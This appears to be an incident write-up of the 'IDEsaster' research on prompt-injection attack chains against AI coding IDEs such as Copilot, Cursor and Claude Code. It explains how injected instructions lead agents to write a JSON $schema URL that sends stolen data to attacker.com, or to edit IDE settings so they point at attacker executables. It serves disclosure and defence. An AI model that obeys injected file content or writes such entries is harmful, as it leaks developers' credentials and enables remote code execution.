IDEsaster research exposes 30+ flaws in EVERY major AI coding IDE

Tombstone icon

Security researcher Ari Marzouk discovered over 30 vulnerabilities across AI coding tools including GitHub Copilot, Cursor, Windsurf, Claude Code, Zed, JetBrains Junie, and more. 100% of tested AI IDEs were vulnerable to attack chains combining prompt injection with auto-approved tool calls and legitimate IDE features to achieve data exfiltration and remote code execution.

Incident Details

Severity:Catastrophic
Company:Multiple (GitHub Copilot, Cursor, Windsurf, Claude Code, Zed, Roo Code, JetBrains)
Perpetrator:AI coding assistants
Incident Date:
Blast Radius:Millions of developers using AI-powered IDEs exposed to RCE and data exfiltration via universal attack chains

A New Vulnerability Class

On December 6, 2025, security researcher Ari Marzouk (who publishes under the handle MaccariTA) disclosed a set of findings from six months of research into AI-powered code editors. The results were bad in a way that was different from the usual security disclosure.

Individual bugs in individual products are normal. Marzouk found something structural: a vulnerability class that affects the entire category of AI coding tools. He named it IDEsaster.

Over 30 separate security vulnerabilities across 10+ products. 24 assigned CVE identifiers. An AWS security advisory (AWS-2025-019). Claude Code's documentation updated to reflect the risk. And the number that matters most: 100% of tested AI IDEs and coding assistants were vulnerable to the core attack chain.

GitHub Copilot, Cursor, Windsurf, Kiro.dev, Zed.dev, Roo Code, Junie, Cline, Gemini CLI, Claude Code - every single one fell to the same category of attack.

The Core Insight

IDEs - Integrated Development Environments, the software developers use to write code - have been around for decades. Visual Studio Code, JetBrains IntelliJ, Zed, and others have features for reading files, writing files, managing settings, loading workspace configurations, and fetching remote resources. These features have existed for years and were designed for human operators who understand what they're doing.

Then AI agents arrived. Companies bolted AI assistants onto these existing IDEs, giving the agents the ability to use the same tools and features that humans use: read files, write files, edit settings, create configurations. The AI agents treat these IDE features as safe because the IDEs treat them as safe. They've been there for years without being security problems.

But humans and AI agents are different kinds of operators. A human developer doesn't write a JSON file with a malicious schema URL because they can see it's malicious. An AI agent that's been manipulated through prompt injection will write exactly that file because it's following instructions it can't distinguish from legitimate ones.

Marzouk articulated the problem: "All AI IDEs effectively ignore the base software in their threat model. They treat their features as inherently safe because they've been there for years. However, once you add AI agents that can act autonomously, the same features can be weaponized into data exfiltration and RCE primitives."

The Attack Chain

IDEsaster attacks follow a three-step chain: Prompt Injection leads to Tool Use which triggers Base IDE Features.

Step one is context hijacking - getting the AI agent to follow the attacker's instructions instead of the developer's. This can happen through hidden text in a README file, invisible Unicode characters in pasted content, a compromised MCP (Model Context Protocol) server, or instructions embedded in any file the AI agent reads. If the agent opens a malicious repository, the attack surface includes every file in that repository.

Step two is tool abuse. Once the AI agent is following the attacker's instructions, it uses the same legitimate tools it always uses - read_file, write_file, edit_file, search_files. These tools are auto-approved for in-workspace operations by default in most AI coding tools, because blocking them would make the AI assistant useless. The agent reads sensitive files (SSH keys, environment variables, credentials) and writes new files or edits existing ones, all without triggering any approval prompt.

Step three is where IDEsaster differs from previous AI coding tool vulnerabilities. The AI agent's file operations trigger features built into the IDE itself.

Three Attack Patterns

Marzouk documented three specific attack patterns that worked across the entire product category.

Remote JSON Schema Exfiltration. The AI agent, following injected instructions, writes a JSON file that includes a $schema field pointing to an attacker-controlled URL. The URL contains the stolen data encoded as query parameters: $schema: "https://attacker.com/log?data=SENSITIVE_DATA". When the IDE processes the JSON file, it automatically makes a GET request to fetch the schema - a standard IDE behavior that has existed for years. That GET request sends the sensitive data to the attacker's server. This worked even with diff-preview enabled, bypassing human-in-the-loop defenses because the exfiltration happens when the IDE processes the file, not when the user approves it.

Affected products for this pattern received CVEs including CVE-2025-49150 (Cursor), CVE-2025-53097 (Roo Code), and CVE-2025-58335 (JetBrains Junie). GitHub Copilot and Kiro.dev were affected but received no CVE. Claude Code addressed it with a security warning.

IDE Settings Overwrite. The AI agent edits the IDE's settings files - .vscode/settings.json for VS Code-based editors or .idea/workspace.xml for JetBrains. It sets a configuration value like php.validate.executablePath or PATH_TO_GIT to point to an attacker-controlled executable. The IDE then runs that executable as part of its normal operation - validating PHP syntax or running Git commands - achieving arbitrary code execution on the developer's machine.

CVE-2025-53773 (GitHub Copilot), CVE-2025-54130 (Cursor), CVE-2025-53536 (Roo Code), and CVE-2025-55012 (Zed.dev) were assigned for this pattern.

Workspace Configuration Override. The AI agent edits .code-workspace files to override multi-root workspace settings, which can include executable paths and environment configurations. Because file writes to in-workspace files are auto-approved by default, this results in arbitrary code execution without any user interaction or the need to reopen the workspace.

CVE-2025-64660 (GitHub Copilot), CVE-2025-61590 (Cursor), and CVE-2025-58372 (Roo Code) were assigned here.

Why This Is Different

Previous AI coding tool vulnerabilities targeted specific AI extensions or agent configurations. A bug in Cursor's MCP handling, a flaw in Copilot's prompt processing, a weakness in Cline's command execution - these were individual product bugs that could be patched individually.

IDEsaster targets the IDE layer underneath. Visual Studio Code's JSON schema fetching, JetBrains' settings handling, and Zed's configuration processing are features shared by every AI extension that runs on top of those platforms. A vulnerability in this layer cascades across every AI tool built on that foundation. Fixing it requires either changing how the base IDE handles these features (which would break non-AI workflows that depend on them) or fundamentally rearchitecting how AI agents interact with the IDE's file system and configuration.

The Mitigation Problem

Marzouk's recommendations are technically sound and practically difficult. He advises developers to only use AI IDEs with trusted projects and files, only connect to trusted MCP servers, manually review pasted content for hidden instructions, and monitor MCP servers for changes.

Following this advice would mean: don't open unknown GitHub repositories with AI assistance enabled, don't connect to MCP servers without auditing their code first, check every URL and pasted text for invisible Unicode characters before giving it to the AI, and continuously monitor every external service the AI connects to.

The people most likely to encounter malicious repositories are also the people most likely to use AI tools to understand unfamiliar code quickly. The attack surface and the use case are the same thing.

For IDE and AI agent developers, Marzouk recommends applying least privilege to LLM tools, minimizing prompt injection vectors, hardening system prompts, sandboxing command execution, and testing for path traversal and information leakage. These are standard secure development practices. That none of the 10+ tested products had implemented them for the AI-IDE interaction layer shows how far the industry was from treating AI agent integration as a security boundary.

The Broader Pattern

Marzouk coined a principle he calls "Secure for AI" - the idea that adding AI capabilities to existing software fundamentally changes the application's threat model and requires re-evaluating features that were previously safe. A JSON schema fetch that has been part of VS Code since its early days was never a security concern when only humans could trigger it. When an AI agent manipulated by prompt injection can trigger it, the feature becomes an exfiltration primitive.

This principle extends well beyond IDEs. Any application that adds AI agents with the ability to use the application's existing features inherits the same class of vulnerability. The AI agent becomes an untrusted operator using trusted tools, and the gap between those two facts is where IDEsaster lives.

Discussion